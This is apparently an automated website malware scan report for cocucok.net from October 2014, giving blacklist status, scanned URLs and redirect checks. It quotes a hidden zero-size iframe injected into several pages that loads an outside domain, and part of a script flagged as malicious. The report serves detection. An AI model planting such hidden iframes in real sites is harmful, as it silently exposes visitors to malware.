Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cocucok.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cocucok.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://cocucok.net/ | 200 OK Content-Length: 90813 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://hatebuhi.cf/ <iframe src="http://hatebuhi.cf/" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no> | ||
http://cocucok.net/templates/cocucku/fastheme/js/ok.js | 200 OK Content-Length: 6117 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function NewOdnaknopka2() { this.domain=location.href+'/'; this.domain=this.domain.substr(this.domain.indexOf('://')+3); this.domain=this.domain.substr(0,this.domain.indexOf('/')); this.location=false; this.selection=function() { var sel; if (window.getSelection) sel=window.getSelection(); else if (document.selection) sel=document.selection.createRange(); else sel=''; if (sel.text) sel=sel.text; return encodeURIComponent(sel); } } } odnaknopka2=new NewOdnaknopka2(); odnaknopka2.init(); Antivirus reports:
| ||
http://samiana.com/49a2/75b/6/77e8b | 200 OK Content-Length: 8226 Content-Type: application/javascript | clean |
http://gagacon.com/79v/c96/802791d73023d273 | 200 OK Content-Length: 8226 Content-Type: application/javascript | clean |
http://cocucok.net/templates/cocucku/fastheme/js/easy-compressed/ftooltip.js | 200 OK Content-Length: 3512 Content-Type: application/x-javascript | clean |
http://cocucok.net/engine/ajax/menu.js | 200 OK Content-Length: 3368 Content-Type: application/x-javascript | clean |
http://cocucok.net/engine/ajax/dle_ajax.js | 200 OK Content-Length: 4731 Content-Type: application/x-javascript | clean |
http://cocucok.net/engine/ajax/js_edit.js | 200 OK Content-Length: 6023 Content-Type: application/x-javascript | clean |
http://reformal.ru/tab.js?title=%D1%EE%F1%E8%F1%EE%EA.%CD%C5%D2&domain=cocucku-com&color=1B78B4&align=left<itle=&lfont=&lsize=&waction=0®ime=0 | 200 OK Content-Length: 9935 Content-Type: application/x-javascript | clean |
http://cocucok.net/go/aHR0cDovL2ZlZWRzLmZlZWRidXJuZXIuY29tL2NvY3Vja3U | HTTP/1.1 302 Found Connection: close Date: Tue, 07 Oct 2014 02:30:48 GMT Location: /index.php Server: nginx/0.7.67 Vary: Accept-Encoding Content-Length: 174 Content-Type: text/html; charset=windows-1251 X-Powered-By: PHP/5.3.3-7+squeeze17 | clean |
http://cocucok.net/index.php | 200 OK Content-Length: 89780 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://hatebuhi.cf/ <iframe src="http://hatebuhi.cf/" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no> | ||
http://cocucok.net/2014/10/04/ukrainskaya-kuhnya-brinzovie-galushki.html | 200 OK Content-Length: 44242 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://hatebuhi.cf/ <iframe src="http://hatebuhi.cf/" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no> | ||
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 101649 Content-Type: application/javascript | clean |
http://gagacon.com/31b77/1cf3328a/d5 | 200 OK Content-Length: 8226 Content-Type: application/javascript | clean |
http://userapi.com/js/api/openapi.js?34 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
http://cocucok.net/engine/ajax/bbcodes.js | 200 OK Content-Length: 7788 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cocucok.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 07 Oct 2014 02:30:42 GMT
Pragma: no-cache
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 06 Oct 2014 20:30:42 +0400 GMT
Set-Cookie: PHPSESSID=m9b9tg2n2e7rjn7pmekv568ab4; path=/
X-Powered-By: PHP/5.3.3-7+squeeze17
GET / HTTP/1.1
Host: cocucok.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 07 Oct 2014 02:30:42 GMT
Pragma: no-cache
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 06 Oct 2014 20:30:42 +0400 GMT
Set-Cookie: PHPSESSID=m9b9tg2n2e7rjn7pmekv568ab4; path=/
X-Powered-By: PHP/5.3.3-7+squeeze17
Second query (visit from search engine):
GET / HTTP/1.1
Host: cocucok.net
Referer: http://www.google.com/search?q=cocucok.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cocucok.net
Referer: http://www.google.com/search?q=cocucok.net
Result:
The result is similar to the first query. There are no suspicious redirects found.